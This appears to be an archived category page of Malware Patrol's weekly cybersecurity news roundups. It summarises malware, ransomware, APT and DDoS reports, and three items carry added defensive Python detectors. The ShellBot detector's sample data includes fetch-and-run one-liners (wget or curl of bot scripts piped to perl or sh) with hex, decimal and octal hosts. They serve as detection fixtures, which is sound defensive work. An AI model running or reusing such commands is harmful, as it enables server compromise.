DDoS Archives - Malware Patrol
https://www.malwarepatrol.net/category/ddos/
Intelligent Threat Data. Last updated Wed, 29 Nov 2023 14:34:18 +0000.

InfoSec Articles (11/21/23 – 11/28/23)
https://www.malwarepatrol.net/infosec-articles-11-21-23-11-28-23/
Wed, 29 Nov 2023 14:34:18 +0000


Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks

Source: The Hacker News

A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. Read more.

Third-party data breach affecting Canadian government could involve data from 1999

Source: The Register

The government of Canada has confirmed its data was accessed after two of its third-party service providers were attacked. The third parties both provided relocation services for public sector workers and the government is currently analyzing a “significant volume of data” which could date back to 1999. Read more.

Play Ransomware Goes Commercial – Now Offered as a Service to Cybercriminals

Source: The Hacker News

The ransomware strain known as Play is now being offered to other threat actors “as a service,” new evidence unearthed by Adlumin has revealed. Read more.

DarkGate and PikaBot Phishing Campaign is Using Qakbot Tactics

Source: Security Boulevard

The operators behind a phishing campaign that is distributing the DarkGate and PikaBot malware are using many of the techniques attributed to the notorious QakBot operation that was taken down by law enforcement agencies in August. Read more.

Citrix warns admins to kill NetScaler user sessions to block hackers

Source: BLEEPING COMPUTER

Citrix reminded admins today that patching NetScaler appliances against the CVE-2023-4966 ‘Citrix Bleed’ vulnerability is not enough on its own: session tokens leaked before the update remain usable until they are invalidated. Besides applying the security updates, admins are advised to wipe all persisted sessions and terminate all active ones. Read more.

Anonymous Sudan DDoS Attack Cloudflare Decoded

Source: Security Boulevard

Cloudflare swiftly acknowledged the DDoS attack, emphasizing that it affected only the www.cloudflare.com website and left its broader range of products and services untouched. A Cloudflare spokesperson assured users that no customer data or services were compromised during the incident; the public website runs on separate infrastructure, which is what contained the collateral damage. Read more.

Malware dev says they can revive expired Google auth cookies

Source: BLEEPING COMPUTER

The Lumma information-stealer malware (aka ‘LummaC2’) is promoting a new feature that allegedly allows cybercriminals to restore expired Google cookies, which can be used to hijack Google accounts. Read more.

DPRK Hackers Masquerade as Tech Recruiters, Job Seekers

Source: DARK READING

North Korean threat actors are posing as both job recruiters and job seekers on the Web, deceiving companies and applicants for financial gain and, possibly, to gain access into Western organizations. Read more.

New Flaws in Fingerprint Sensors Let Attackers Bypass Windows Hello Login

Source: The Hacker News

The flaws were discovered by researchers at hardware and software product security and offensive research firm Blackwing Intelligence, who found the weaknesses in the fingerprint sensors from Goodix, Synaptics, and ELAN that are embedded into the devices. Read more.

Welltok Data Breach Impacted 8.5 Million Patients in the U.S.

Source: Security Affairs

The company disclosed a data breach that exposed the personal data of nearly 8.5 million patients (8,493,379) in the U.S. On July 26, 2023, threat actors hacked the company’s MOVEit Transfer server. Read more.

ClearFake Campaign Spreads macOS AMOS Information Stealer

Source: Security Affairs

Threat actors spread Atomic Stealer (AMOS) macOS information stealer via a bogus web browser update as part of the ClearFake campaign. Read more.

PoC for Splunk Enterprise RCE flaw released (CVE-2023-46214)

Source: HELP NET SECURITY

A vulnerability researcher has published a detailed analysis of CVE-2023-46214 and has consolidated the steps required for exploitation into a Python script. If specific prerequisites are met, the script should open a remote command prompt. Read more.

Hackers Hijack Industrial Control System at US Water Utility

Source: SECURITY WEEK

The Municipal Water Authority of Aliquippa in Pennsylvania has confirmed that hackers took control of a system associated with a booster station over the weekend, but said there was no risk to the water supply. Read more.

GE servers hacked and DARPA Military Info Leaked

Source: Cybersecurity INSIDERS

General Electric, commonly referred to as GE, a multinational corporation engaged in the fields of renewable energy, aerospace, and power, has fallen prey to a cyber attack resulting in the leakage of sensitive information related to DARPA Military operations. Read more.

The post InfoSec Articles (11/21/23 – 11/28/23) appeared first on Malware Patrol.

InfoSec Articles (11/07/23 – 11/14/23)
https://www.malwarepatrol.net/infosec-articles-11-07-23-11-14-23/
Wed, 15 Nov 2023 03:54:14 +0000

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Japan Aviation Electronics Targeted in Ransomware Attack

Source: SECURITY WEEK

While Japan Aviation Electronics has not found evidence of data exfiltration, the Alphv/BlackCat ransomware gang claims to have stolen roughly 150,000 documents from the company, including blueprints, contracts, confidential messages, and reports. Read more.

Microsoft Authenticator Restricts Suspicious MFA Notifications

Source: Latest Hacking News

The Redmond giant has recently announced a new security feature for its authenticator app. With this feature, the Microsoft Authenticator app suppresses multi-factor authentication push notifications it deems suspicious, to prevent potential abuse. Read more.

Chinese multinational bank hit by ransomware

Source: HELP NET SECURITY

The state-owned Industrial and Commercial Bank of China (ICBC), which is one of the largest banks in the world, has been hit by a ransomware attack that led to disrupted trades in the US Treasury market. Read more.

After ChatGPT, Anonymous Sudan Took Down The Cloudflare Website

Source: Security Affairs

The hacktivist group Anonymous Sudan claimed responsibility for the massive distributed denial-of-service (DDoS) attack that took down the website of Cloudflare. Cloudflare confirmed that a DDoS attack took down its website for a few minutes and pointed out that it did not impact other products or services. Read more.

Threat Actors Leverage File-Sharing Service and Reverse Proxies for Credential Harvesting

Source: TREND MICRO

The attacker-controlled reverse proxies function as intermediary servers positioned between the target and a legitimate authentication endpoint, such as the Microsoft 365 login page. When a victim interacts with the fake login page, the reverse proxy presents the genuine login form, manages incoming requests, and conveys responses from the legitimate Microsoft 365 login page. Read more.

Iranian hackers launch malware attacks on Israel’s tech sector

Source: BLEEPING COMPUTER

Security researchers have tracked a new campaign from Imperial Kitten targeting transportation, logistics, and technology firms. Imperial Kitten is also known as Tortoiseshell, TA456, Crimson Sandstorm, and Yellow Liderc, and for several years it used the online persona Marcella Flores. Read more.

Unlucky Kamran: Android malware spying on Urdu-speaking residents of Gilgit-Baltistan

Source: welivesecurity

When opened on a mobile device, the Urdu version of the Hunza News website offers readers the possibility to download the Hunza News Android app directly from the website, but the app has malicious espionage capabilities. Read more.

Routers Targeted for Gafgyt Botnet [Guest Diary]

Source: SANS Internet Storm Center

The threat actor attempts to add my honeypot into a botnet so the threat actor can carry out DDoS attacks. The vulnerabilities used for the attack were default credentials and CVE-2017-17215. To prevent these attacks, make sure systems are patched and using strong credentials. Read more.

Keeping Up with Today’s Top Mobile Spyware Threat Trends

Source: CheckPoint

In this post, we will explore trends including the rise of new and more sophisticated types of mobile spyware: nation-level spyware and modified applications. We’ll also present several best practices to help you protect all your organization’s assets. Read more.

Police Seized BulletProftLink Phishing-as-a-Service (PhaaS) Platform

Source: Security Affairs

The Royal Malaysian Police announced that it has dismantled the notorious BulletProftLink phishing-as-a-service (PhaaS) platform. A joint international operation conducted by the Malaysian police, the FBI, and the Australian Federal Police took down several domains employed in the cybercriminal operation. Read more.

It’s Still Easy for Anyone to Become You at Experian

Source: Krebs on Security

In the summer of 2022, KrebsOnSecurity documented the plight of several readers who had their accounts at big-three consumer credit reporting bureau Experian hijacked after identity thieves simply re-registered the accounts using a different email address. Sixteen months later, Experian clearly has not addressed this gaping lack of security. Read more.

The Lorenz Ransomware Group Hit Texas-Based Cogdell Memorial Hospital

Source: Security Affairs

The Lorenz extortion group claimed responsibility for the security breach and added the hospital to its Tor leak site. The group claims to have stolen more than 400GB of data, including internal files, patient medical images, and employee email communications. Read more.

Microsoft Warns of Fake Skills Assessment Portals Targeting IT Job Seekers

Source: The Hacker News

A sub-cluster within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns. Microsoft attributed the activity to a threat actor it calls Sapphire Sleet, describing it as a “shift in the persistent actor’s tactics.” Read more.

Chinese APT Targeting Cambodian Government

Source: Unit 42 by Palo Alto

Unit 42 has identified malicious Chinese APT infrastructure masquerading as cloud backup services. Monitoring telemetry associated with two prominent Chinese APT groups, we observed network connections predominately originating from the country of Cambodia, including inbound connections originating from at least 24 Cambodian government organizations. Read more.


InfoSec Articles (10/24/23 – 10/31/23)
https://www.malwarepatrol.net/infosec-articles-10-24-23-10-31-23/
Wed, 01 Nov 2023 06:44:50 +0000

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Cybercrime Supply Chain 2023: Measurements and Assessments of Cyber Attack Resources and Where Criminals Acquire Them

Source: Interisle

Interisle researchers, using data from the Cybercrime Information Center, analyzed more than 10 million cybercrime records and found distinct, persistent patterns of exploitation and abuse covering a 365-day period from September 2022 to August 2023. Read more.

Android Malware Masquerades As Chrome Browser Reads SMS & Intercepts Emails

Source: GBHackers

Cybersecurity researchers at K7 Security Labs recently identified Rusty Droid RAT, a stealthy Android malware masquerading as a Chrome browser to read SMS and intercept emails. Read more.

The Rise of S3 Ransomware: How to Identify and Combat It

Source: The Hacker News

Despite S3 being a secure service from a reputable provider, its pivotal role in handling vast amounts of sensitive data (customer personal information, financial data, intellectual property, etc.), provides a juicy target for threat actors. Read more.

Quishing: Tricks to look out for

Source: HELP NET SECURITY

By now, most people know what a QR code looks like and that they need to scan it to get to information “embedded” in it. Unfortunately, not many users know that QR codes are not inherently safe and may be used for malicious purposes. Read more.

New iLeakage attack steals emails, passwords from Apple Safari

Source: BLEEPING COMPUTER

Academic researchers created a new speculative side-channel attack they named iLeakage that works on all recent Apple devices and can extract sensitive information from the Safari web browser. Read more.

The Danger of Forgotten Pixels on Websites: A New Case Study

Source: The Hacker News

Recently, Reflectiz, an advanced website security solution provider, released a case study focusing on a forgotten and misconfigured pixel that had been associated with a leading global healthcare provider. This overlooked piece of code surreptitiously gathered private data without user consent, potentially exposing the company to substantial fines and damage to its reputation. Read more.

ServiceNow quietly addresses unauthenticated data exposure flaw from 2015

Source: The Register

ServiceNow’s widgets act as powerful APIs for the platform’s Service Portal. Despite a code change earlier this year to improve safety, the default configuration of these widgets was to set their records public, meaning that if they’re left unchanged, they will return the type of data an attacker specifies. Read more.

The Duck is Hiring in Italy: DUCKTAIL Spread via Compromised LinkedIn Profiles
By Clus

Source: DuskRise

Cluster25 observed a malicious campaign that employs LinkedIn messages as a vector for executing identity theft attacks. In this campaign, compromised LinkedIn accounts are utilized to send messages to users with the aim of compromising their accounts by illicitly procuring their cookies, session data, and browser credentials. Read more.

Trojanized PyCharm Software Version Delivered via Google Search Ads

Source: The Hacker News

A new malvertising campaign has been observed capitalizing on a compromised website to promote spurious versions of PyCharm on Google search results by leveraging Dynamic Search Ads. Read more.

Latest Cloudflare distributed denial-of-service report details record-setting attack

Source: silicon ANGLE

The record-breaking attack in question hit an unprecedented 201 million requests per second. The figure is notably higher than the previous largest recorded attack, which stood at 71 million rps and was detailed by Cloudflare in February. Read more.

A cascade of compromise: unveiling Lazarus’ new campaign

Source: SECURELIST

The adversary demonstrated a high level of sophistication, employing advanced evasion techniques and introducing SIGNBT malware for victim control. In addition, other malware found in memory included Lazarus’ prominent LPEClient, a tool known for victim profiling and payload delivery that has previously been observed in attacks on defense contractors and the cryptocurrency industry. Read more.

Citrix Bleed: Leaking Session Tokens with CVE-2023-4966

Source: Assetnote

Earlier this month Citrix released a security bulletin which mentioned “unauthenticated buffer-related vulnerabilities” and two CVEs. These issues affected Citrix NetScaler ADC and NetScaler Gateway. Read more.

Hackers Cripple Five Ontario Hospitals by Hitting a Single Service Provider

Source: Bitdefender

Five hospitals in Canada are unable to continue normal caretaking of patients due to a cyberattack against their joint service provider. Non-emergency patients are told to visit their local clinic. Read more.

Hacktivism in the Israel-Hamas Conflict | Citizen Data Leaked Using Old Malware

Source: SentinelOne

So far, the use of novel malware/scareware and tools such as Redline Stealer and PrivateLoader by these threat actors continues to target Israeli citizens, businesses, and critical sector entities, causing data leaks and widespread disruptions. Read more.


InfoSec Articles (10/10/23 – 10/17/23)
https://www.malwarepatrol.net/infosec-articles-10-10-23-10-17-23/
Wed, 18 Oct 2023 10:01:27 +0000

Welcome to our weekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our weekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

Threat Actor Profile: Strox Phishing-as-a-Service

Source: PhishLABS

Strox has become one of the most complete phishing solutions for fraud actors available, offering advanced phishing kits, hosting services, mail spam scripts, and an automated market for selling stolen credentials. Read more.

The Art of Concealment: A New Magecart Campaign That’s Abusing 404 Pages

Source: Akamai

This campaign stands out because of its three advanced concealment techniques, one of which we had never seen before — specifically, manipulating the website’s default 404 error page to hide malicious code — that poses unique challenges for detection and mitigation. Read more.

Vulnerability Exposed in WordPress Plugin User Submitted Posts

Source: InfoSecurity Magazine

A new vulnerability in the User Submitted Posts WordPress plugin (versions 20230902 and below) has been discovered by the Patchstack team. With over 20,000 active installations, this popular plugin is used for user-generated content submissions and is developed by Plugin Planet. Read more.

ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses

Source: ASEC

ASEC has recently discovered a change in the distribution method of the ShellBot malware, which is being installed on poorly managed Linux SSH servers. The overall flow remains the same, but the download URL used by the threat actor to install ShellBot has changed from a regular IP address to a hexadecimal value. Read more.
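The trick ASEC describes works because wget, curl and the C library's inet_aton() accept an IPv4 host written as hex, octal, decimal or with fewer than four components, while naive blocklists and regexes only recognise dotted quads. The following is an added example, not code from ASEC or from the original post: it canonicalises every inet_aton()-style numeric host found in a batch of shell commands so that the real download address can be matched against a blocklist. The sample commands and the RFC 1918 address they point at are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample of one-liners of the kind dropped on a weak SSH server. The
# hosts are the same private address written in the notations inet_aton() accepts.
SAMPLE_COMMANDS = [
    "wget -q http://0xC0A80001/shellbot.pl -O /tmp/x; perl /tmp/x",  # hex, one component
    "curl -s http://3232235521/ircbot.sh | sh",                       # decimal, one component
    "wget http://0300.0250.0.1/bot.pl",                               # octal components
    "wget http://0xc0.0xa8.0.1/bot.pl",                               # hex components
    "wget http://192.168.0.1/bot.pl",                                 # plain dotted quad
    "curl https://downloads.example.com/update.tar.gz",               # ordinary hostname
]

URL_RE = re.compile(r"https?://[^\s'\"|;]+")

def _component(part: str) -> int:
    """Parse one dot-separated component the way inet_aton() does."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]+", part):        # leading zero means octal
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(part)

def normalize_host(host: str):
    """Return the dotted-quad form of an inet_aton()-style numeric host, or None
    if the host is not numeric (e.g. a DNS name) or does not fit in 32 bits."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_component(p) for p in parts]
    except ValueError:
        return None
    lead, last = nums[:-1], nums[-1]
    if any(n > 255 for n in lead):
        return None
    tail_bits = 8 * (4 - len(lead))           # the last component fills the remaining bytes
    if last >= 1 << tail_bits:
        return None
    value = 0
    for n in lead:
        value = (value << 8) | n
    value = (value << tail_bits) | last
    return str(ipaddress.IPv4Address(value))

def inspect_url(url: str) -> dict:
    """Describe a URL's host: the literal text, the canonical IPv4 if the host is
    numeric, and whether the literal form differs from the canonical dotted quad."""
    host = urlsplit(url).hostname or ""       # urlsplit lowercases the host for us
    ip = normalize_host(host)
    return {"url": url, "host": host, "ip": ip,
            "obfuscated": ip is not None and ip != host}

def scan_commands(lines):
    """Return a record for every URL whose host is a numeric IPv4 written in a
    non-canonical (hex/octal/decimal/short) form."""
    hits = []
    for line in lines:
        for url in URL_RE.findall(line):
            rec = inspect_url(url)
            if rec["obfuscated"]:
                hits.append(rec)
    return hits

if __name__ == "__main__":
    for rec in scan_commands(SAMPLE_COMMANDS):
        print(f'{rec["host"]:>16} -> {rec["ip"]}  ({rec["url"]})')
```

The point of canonicalising rather than just flagging is that the resulting address can be fed to the same IP blocklist or threat feed lookup the rest of the pipeline already uses; the "obfuscated" flag is worth keeping as a separate detection, since legitimate installers do not write their download hosts this way.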

Microsoft: State hackers exploiting Confluence zero-day since September

Source: BLEEPING COMPUTER

Microsoft says a Chinese-backed threat group tracked as ‘Storm-0062’ (aka DarkShadow or Oro0lxy) has been exploiting a critical privilege escalation zero-day in the Atlassian Confluence Data Center and Server since September 14, 2023. Read more.

Multiple Citrix NetScaler Flaws Lead to DoS Attack and Data Exposure

Source: GBHackers

Critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway could expose sensitive information and enable denial of service. A malicious cyber actor could exploit one of these vulnerabilities to take control of an affected device. Citrix has published security updates to address the vulnerabilities impacting several products. Read more.

Microsoft Fixes Exploited Zero-Days in WordPad, Skype for Business

Source: SECURITY WEEK

Microsoft’s security response team on Tuesday pushed out a massive batch of software and OS updates to cover more than 100 vulnerabilities across the Windows ecosystem and warned that three of the flaws are already being exploited in the wild. Read more.

Microsoft to Phase Out NTLM in Favor of Kerberos for Stronger Authentication

Source: The Hacker News

Microsoft has announced that it plans to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative authentication methods to bolster security. Read more.

#StopRansomware: AvosLocker Ransomware (Update)

Source: CISA

AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data. Read more.

Fortinet Releases Security Updates for Multiple Products

Source: CISA

Fortinet has released security advisories addressing vulnerabilities in multiple products. These vulnerabilities may allow cyber threat actors to take control of the affected systems. Read more.

Juniper Networks Patches Over 30 Vulnerabilities in Junos OS

Source: SECURITY WEEK

The most severe of these issues is an incorrect default permissions bug that allows an unauthenticated attacker with local access to a vulnerable device to create a backdoor with root privileges. Read more.

Biggest DDoSes of all time generated by protocol 0-day in HTTP/2

Source: ars TECHNICA

Unlike other high-severity zero-days in recent years—Heartbleed or log4j, for example—which caused chaos from a torrent of indiscriminate exploits, the more recent attacks, dubbed HTTP/2 Rapid Reset, were barely noticeable to all but a select few engineers. Read more.
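Rapid Reset abuses the fact that an HTTP/2 client can open a stream with HEADERS and immediately cancel it with RST_STREAM: the server has already queued the request, but the cancelled stream no longer counts against the client's concurrent-stream limit, so one connection can generate an unbounded request rate. The mitigation that the affected vendors converged on is to budget premature resets per connection and send GOAWAY when the budget is exceeded. The following is an added example, not code from the Ars Technica article or from any vendor: a detector over a constructed frame log that applies exactly that budget. The window, threshold and "premature" age are assumptions chosen for the example.

```python
from collections import defaultdict, deque

def detect_rapid_reset(events, window=1.0, threshold=100, min_stream_age=0.05):
    """Flag connections that cancel freshly opened streams at a rate no real client
    sustains. `events` are (ts_seconds, conn_id, frame_type, stream_id) tuples.
    A RST_STREAM is "premature" if it arrives less than `min_stream_age` seconds
    after the HEADERS that opened the stream; a connection is flagged once it has
    sent `threshold` premature resets inside any `window`-second span.
    Returns {conn_id: ts_at_which_it_was_flagged}."""
    opened_at = {}                      # (conn, stream) -> ts of the opening HEADERS
    premature = defaultdict(deque)      # conn -> timestamps of recent premature resets
    flagged = {}
    for ts, conn, frame, stream in sorted(events):
        key = (conn, stream)
        if frame == "HEADERS":
            opened_at.setdefault(key, ts)
        elif frame == "RST_STREAM":
            opened = opened_at.pop(key, None)
            if opened is None or ts - opened >= min_stream_age:
                continue                # normal cancellation, or a stream we never saw opened
            recent = premature[conn]
            recent.append(ts)
            while recent and ts - recent[0] > window:
                recent.popleft()        # slide the window
            if len(recent) >= threshold and conn not in flagged:
                flagged[conn] = ts
    return flagged

def sample_events():
    """Constructed traffic: one browser-like connection and one Rapid Reset flood."""
    ev = []
    # Browser: 50 requests spread over 5 s; two are cancelled 200 ms later because
    # the user navigated away. These must not trip the detector.
    for i in range(50):
        t = i * 0.1
        sid = 2 * i + 1                 # client-initiated streams are odd-numbered
        ev.append((t, "conn-browser", "HEADERS", sid))
        if i in (10, 30):
            ev.append((t + 0.2, "conn-browser", "RST_STREAM", sid))
    # Attacker: 300 streams, each reset 1 ms after it is opened, all inside 0.3 s.
    for i in range(300):
        t = i * 0.001
        sid = 2 * i + 1
        ev.append((t, "conn-attacker", "HEADERS", sid))
        ev.append((t + 0.001, "conn-attacker", "RST_STREAM", sid))
    return ev

if __name__ == "__main__":
    for conn, ts in detect_rapid_reset(sample_events()).items():
        print(f"{conn}: exceeded premature-reset budget at t={ts:.3f}s; send GOAWAY")
```

Counting only premature resets matters: ordinary clients do reset streams (tab closed, navigation, speculative prefetch abandoned), and a detector keyed on raw RST_STREAM counts would throttle them; what no legitimate client does is open and cancel hundreds of streams per second on one connection.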

Ransomlooker, A New Tool To Track And Analyze Ransomware Groups’ Activities

Source: Security Affairs

The researchers have created the tool to help cybersecurity experts in their daily jobs by providing real-time updates and actionable insights. It offers various statistical insights into data, the ability to determine attack perpetrators, and incorporates filtering by country, industries, time span, and other parameters for journalistic investigations. Read more.

Dozens of Squid Proxy Vulnerabilities Remain Unpatched 2 Years After Disclosure

Source: SECURITY WEEK

Dozens of vulnerabilities affecting the Squid caching and forwarding web proxy remain unpatched two years after a researcher responsibly disclosed them to developers. Read more.


InfoSec Articles (03/15/2023 – 03/28/2023)
https://www.malwarepatrol.net/infosec-articles-03-15-2023-03-28-2023/
Tue, 28 Mar 2023 08:58:07 +0000

Weekly, our experts select relevant news in the cybersecurity industry. Over the last two weeks, we saw “Earth Preta’s Cyberespionage Campaign Hits Over 200”, a study of an active cyberespionage campaign that delves into the structure, goals, and requirements of the organizations involved and provides an opportunity for wider intelligence analysis and the development of effective countermeasures; “MacStealer: New macOS-based Stealer Malware Identified”; and much more.

For more articles, check out our #onpatrol4malware blog.

MacStealer: New macOS-based Stealer Malware Identified

Source: Uptycs

Uptycs has identified MacStealer, a new macOS information stealer that uses Telegram as its command-and-control channel; it had already identified three Windows-based malware families that use Telegram this year, including Titan Stealer, Parallax RAT, and HookSpoofer. Read more.

Earth Preta’s Cyberespionage Campaign Hits Over 200

Source: Trend Micro

This study on an active cyberespionage campaign delves into the structure, goals, and requirements of the organizations involved, and provides an opportunity to conduct wider intelligence analysis and insights in the development of effective countermeasures. Read more.

How scammers employ IPFS for email phishing

Source: Securelist (Kaspersky)

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies. Read more.
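Because IPFS content is addressed by its hash (the CID) rather than by where it is hosted, the same phishing page is reachable through any public gateway, either path-style (gateway/ipfs/CID/...) or subdomain-style (CID.ipfs.gateway/...). Blocking one gateway domain therefore does little; the durable pivot is the CID. The following is an added example, not code from Kaspersky or from the original post: it extracts the CID and gateway from URLs and groups sightings by CID. The CID patterns, gateway names and sample URLs are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# CIDv0 is "Qm" followed by 44 base58 characters; CIDv1 as served by gateways is
# lowercase base32 starting with "b" (typically 59 characters). Both regexes are
# assumptions of this example, tuned to catch the common forms, not a full CID parser.
CID_RE = r"(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{50,})"
PATH_GATEWAY_RE = re.compile(rf"^/ipfs/({CID_RE})(?:/|$)")
SUBDOMAIN_GATEWAY_RE = re.compile(rf"^({CID_RE})\.ipfs\.(.+)$")

# Constructed CIDs and URLs for the example (not real phishing pages).
CID_V0 = "QmT5NvUtoM5nWFfrQdVrFtvGfKFmG7AHE8P34isapyhCxX"
CID_V1 = "bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi"
SAMPLE_URLS = [
    f"https://ipfs.io/ipfs/{CID_V0}/login.html",
    f"https://cloudflare-ipfs.com/ipfs/{CID_V0}/login.html?email=victim%40example.com",
    f"https://{CID_V1}.ipfs.dweb.link/",
    "https://www.example.com/ipfs/notacid",
    "https://login.example.com/account",
]

def extract_ipfs_ref(url: str):
    """Return {'cid', 'gateway', 'style'} if the URL fetches IPFS content through a
    public gateway, path-style or subdomain-style; otherwise None."""
    parts = urlsplit(url)
    host = parts.hostname or ""             # lowercased by urlsplit; CIDv1 is lowercase anyway
    m = SUBDOMAIN_GATEWAY_RE.match(host)
    if m:
        return {"cid": m.group(1), "gateway": m.group(2), "style": "subdomain"}
    m = PATH_GATEWAY_RE.match(parts.path)   # path keeps its case, so CIDv0 survives here
    if m:
        return {"cid": m.group(1), "gateway": host, "style": "path"}
    return None

def scan_urls(urls):
    """Group IPFS-hosted URLs by CID so one phishing page can be blocked across
    every gateway it is reachable through. Returns {cid: [gateway, ...]}."""
    by_cid = {}
    for url in urls:
        ref = extract_ipfs_ref(url)
        if ref:
            by_cid.setdefault(ref["cid"], []).append(ref["gateway"])
    return by_cid

if __name__ == "__main__":
    for cid, gateways in scan_urls(SAMPLE_URLS).items():
        print(f"{cid}: seen via {', '.join(gateways)}")
```

In a mail gateway or proxy, the CID is the value to add to the blocklist and to share as an indicator; the gateway list is still useful for spotting which gateways a campaign favours, but a new gateway appearing does not require a new rule.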

Beware: Fake IRS tax email delivers Emotet malware

Source: Malwarebytes Labs

A Form W-9 is a form you fill in to confirm certain personal details with the IRS. Name, address, and Tax Identification Number are all things you can expect to fill in on one of these forms. Read more.

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Source: Malwarebytes Labs

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in Samsung Exynos modems, the chips powering many of those devices. Read more.

Exploiting aCropalypse: Recovering Truncated PNGs

Source: David Buchanan

This article assumes you’ve already heard about the aCropalypse vulnerability, aka CVE-2023-21036. If not, go read about it here (oops, this page doesn’t exist yet. Read this tweet in the meantime). Read more.

Nexus: a new Android botnet?

Source: Cleafy

In January 2023, a new Android banking trojan appeared on multiple hacking forums under the name Nexus. However, Cleafy’s Threat Intelligence & Response Team traced the first Nexus infections back to June 2022, well before the public announcement. Read more.


InfoSec Articles (02/02/2023 – 02/14/2023)
https://www.malwarepatrol.net/infosec-articles-02-02-2023-02-14-2023/
Mon, 13 Feb 2023 23:56:07 +0000

Weekly, our experts select relevant news in the cybersecurity industry. Over the last two weeks, we saw “Researchers Uncover 700+ Malicious Open Source Packages” and “CISA and FBI Release ESXiArgs Ransomware Recovery Guidance”, among others.

For more articles, check out our #onpatrol4malware blog.

Phylum Discovers Revived Crypto Wallet Address Replacement Attack

Source: Phylum

Phylum’s automated risk detection platform began alerting us to a long series of suspicious publications which appear to be a revived attempt to deliver the same crypto wallet clipboard replacing malware. Read more.

Avoid Being a Downstream Victim of Service Provider Attacks

Source: Security Intelligence

Earlier this year, some customers of the cloud service provider DigitalOcean received emails instructing them to reset their passwords. These users hadn’t actually forgotten their passwords. Read more.

Bogus URL Shorteners Redirect Thousands of Hacked Sites in AdSense Fraud Campaign

Source: Sucuri

Late last year Sucuri reported on a malware campaign targeting thousands of WordPress websites to redirect visitors to bogus Q&A websites. Read more.

Researchers Uncover 700+ Malicious Open Source Packages

Source: Infosecurity Magazine

Security researchers have discovered another sizeable haul of malicious packages on the npm and PyPI open source registries, which could cause issues if unwittingly downloaded by developers. Read more.

Guide to Container Management on AWS

Source: Trend Micro

There are tools and services in the market that enable automation of the creation, deployment, maintenance, scaling, and monitoring of application or system containers. Read more.

CISA and FBI Release ESXiArgs Ransomware Recovery Guidance

Source: CISA

CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory, ESXiArgs Ransomware Virtual Machine Recovery Guidance. This advisory describes the ongoing ransomware campaign known as ESXiArgs. Read more.

THREAT ALERT: GootLoader – SEO Poisoning and Large Payloads Leading to Compromise

Source: Cybereason Incident Response Team

The Cybereason Incident Response (IR) team investigated an incident which involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files. Read more.


InfoSec Articles (05/09/2022 – 05/23/2022)
https://www.malwarepatrol.net/infosec-articles-05-09-2022-05-23-2022/
Mon, 23 May 2022 17:53:20 +0000

Over the past two weeks, we saw that the CrowdStrike Falcon OverWatch threat hunting team has uncovered a new and highly sophisticated Internet Information Services (IIS) post-exploitation framework that CrowdStrike refers to as IceApple, as well as a 254% increase in activity from a Linux trojan called XorDdos. First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its denial-of-service activity and its use of XOR-based encryption for its communications.

For more articles, check out our #onpatrol4malware blog.

Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis

Source: Malwarebytes Labs

The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer. Read more.

ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK

Source: CrowdStrike

The CrowdStrike Falcon OverWatch team has uncovered a new and highly sophisticated Internet Information Services (IIS) post-exploitation framework that CrowdStrike refers to as IceApple. Read more.

Operation RestyLink: APT campaign targeting Japanese companies

Source: NTT

NTT SOC observed an APT campaign targeting Japanese companies starting in mid-April 2022. In this article, NTT reports a detailed analysis of this campaign and discusses the attributes of the attacking group. Read more.

Twisted Panda: Chinese APT espionage operation against Russian state-owned defense institutes

Source: Check Point Research

In the past two months, CPR observed multiple APT groups attempting to leverage the Russia and Ukraine war as a lure for espionage operations. Read more.

Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices

Source: Microsoft 365 Defender Research Team

